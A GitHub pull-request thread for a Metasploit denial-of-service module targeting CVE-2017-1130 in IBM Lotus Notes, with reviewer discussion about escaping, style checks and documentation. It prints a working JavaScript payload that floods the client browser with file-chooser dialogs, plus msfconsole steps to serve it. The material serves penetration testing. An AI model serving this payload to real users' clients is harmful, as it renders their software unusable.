### PR TITLE
IBM Lotus Notes DoS (CVE-2017-1130)

### PR DESCRIPTION
**Pull request by RootUp**
This module will exploit a vulnerability (CVE-2017-1130) found in some versions of IBM Lotus Notes client, creating many file chooser dialogs and making the application no longer usable.

## Verification

- [x] Start `msfconsole`
- [x] `use use auxiliary/dos/http/ibm_lotus_notes2`
- [x] `set SRVHOST <IP of MSF system to act as server>`
- [x] `set SRVPORT <port of MSF system to act as server>`
- [x] `run`
- [x] in target system's Notes client browser, navigate to the URL given in the output of the previous command
- [x] **Verify** the Notes client browser gets innundated with file chooser dialogs, making it unsuable
- [x] **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))

-----

The below snip code would open up many file select dialog boxes which would cause the client hang and have to be restarted for IBM Notes.
```
<input type="file" id="f">
<script>
var w;
var wins = {};
var i = 1;
f.click();
setInterval("f.click()", 1);
setInterval(function(){
	for (var k in wins) {
		if (wins[k] && wins[k].status === undefined) {
			wins[k].close();
			delete wins[k];
		}
	}
	w = open('data:text/html,<input type=file id=f><script>f.click();setInterval("f.click()", 1);<\/script>');
	if (w) {
		wins[i] = w;
		i++;
	}
}, 1);
</script>
```
I have made an rb module for this as well, but i am facing few challenges, request you to please have a look it giver error some where near this :
```
if (w) {
		wins[i] = w;
		i++;
	}
}, 1);
```

### CODE REVIEW

**Comment by RootUp** [comment]
Hi @pbarry-r7  could you please look into this ans advise its of similar like CVE-2017-1129

**Comment by pbarry-r7** [comment]
Hey @RootUp.  I can try and give it a look this coming week.  For now, there are some Travis failures you could fix (see the "All checks have failed" above and click the Details link and then any of the red lines under the "Build Jobs" section to see the error(s); looks like there are some hard tabs which need to be changed to spaces and also the month in the DisclosureDate should be 'Aug' is what I think it's complaining about, like how you had in the [last PR](https://github.com/rapid7/metasploit-framework/pull/8989/files)).

Also will need a markdown documentation file describing what this module is and showing how it's used.  Thx!!

**Comment by RootUp** [comment]
Hi @pbarry-r7  

Have created documentation for this PR (https://github.com/rapid7/metasploit-framework/pull/9125)
And have changed some errors in script, still few checks are fail, request you to please have a look.

**Comment by jmartin-r7** [comment]
Test failures are due to using tab (`\t`) indentation please convert to spaces as msftidy is picky about this.

**Comment by RootUp** [comment]
Hi @jmartin-r7 

Looks like all checks are passed, but still I am not able to execute JS, however, it still generates errors in the browser during execution somewhere near this 

```
');
	if (w) {
		wins[i] = w;
		i++;
	}
}, 1);
```

Could you please advise.
cc: @pbarry-r7

**Comment by jmartin-r7** [comment]
The html section of your code will produce pop ups on Firefox when loaded in the browser, these are blocked but the tab does continue to attempt them. 

Unfortunately we do not have IBM notes client to test this against.  Is there a possibility the client has some built in protection that is suppressing popup or disables untrusted javascript from auto executing?  The disclosure description notes user interaction required to click on a link to trigger the issue.

**Comment by pbarry-r7** [comment]
My bad, I didn't get to this last week.  I should still have by Notes client installed, will test this out this week for sure.

@RootUp, per @jmartin-r7's comments in #9125, could you add your commit of the markdown documentation to this PR?  One approach is to checkout your *patch-4* directory and then do a `git cherry-pick bbd35c8486c7e9bde1d52c6af1e37aa20f18552a` to pull that markdown commit in, then push and that should take care of it I think.  Thx!

**Comment by pbarry-r7** [comment]
Hey @RootUp, I believe that error in the browser (when the module is serves the web page code to the target) is a simple case of a missing escape so that the javascript-in-a-string makes it to the target in its intended form (this also explains why using a local copy of that html section of code doesn't throw an error, but the copy served up by the module does).  I'll commit my minor change here.

Testing with my notes client v8.5 under Windows 7, I see the client browser become unusable due to repeated file-chooser popups requesting a file to be uploaded, while CPU and memory usage of the target appear usual.  Was this intended behavior?

notes-client

**Comment by RootUp** [comment]
Thank you @pbarry-r7  
And yes, this is how it should be.

File: modules/auxiliary/dos/http/ibm_lotus_notes2.rb [hunk 1]
```diff
@@ -0,0 +1,70 @@
...
+        'Description'    => %q(
+          This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes.
+          If successful, the browser will crash after viewing the webpage.
+        ),
+        'License'        => MSF_LICENSE,
+        'Author'         => [
+          'Dhiraj Mishra',
+        ],
+        'References'     => [
+          [ 'EXPLOIT-DB', '42604'],
```
Comment (nixawk) [inline modules/auxiliary/dos/http/ibm_lotus_notes2.rb]:
```
['EDB', '42604'],
```

Comment (pbarry-r7) [reply modules/auxiliary/dos/http/ibm_lotus_notes2.rb]: Cool, @RootUp.  I restarted the Travis CI job (I think the previous failure was unrelated to your code, rather something with the Docker job).  If you want to update per @nixawk's suggestion (:+1:; looks like this slipped through on the previous PR --#8989-- as well) and cherry-pick or merge your documentation commit (#9125) to this branch, I think we'll be clear to land.

Comment (RootUp) [reply modules/auxiliary/dos/http/ibm_lotus_notes2.rb]: Hi @pbarry-r7 i have made the necessary changes, I try merging #9125 but failed, could you please help me in cherry-pick  for the same.

Thank you !

**Comment by pbarry-r7** [comment]
Per my earlier comment, please try the following, @RootUp:

- `cd <your working git directory where your patch-4 branch is checked out>`
- `git cherry-pick bbd35c8486c7e9bde1d52c6af1e37aa20f18552a`
- `git push`

Thx

**Comment by RootUp** [comment]
Hi @pbarry-r7 i have added documentation for the same, could you please review the same, if all set can we land up here !

**Comment by pbarry-r7** [comment]
Updated title and description (please use the auto-generated template for PRs, @RootUp; it gives us a good consistency across all incoming PRs).  Thx!

**Comment by pbarry-r7** [comment]
# Release Notes

This new DoS module will exploit a vulnerability (CVE-2017-1130) found in some versions of IBM Lotus Notes client, creating many file chooser dialogs and making the application no longer usable.

**Pull request merged**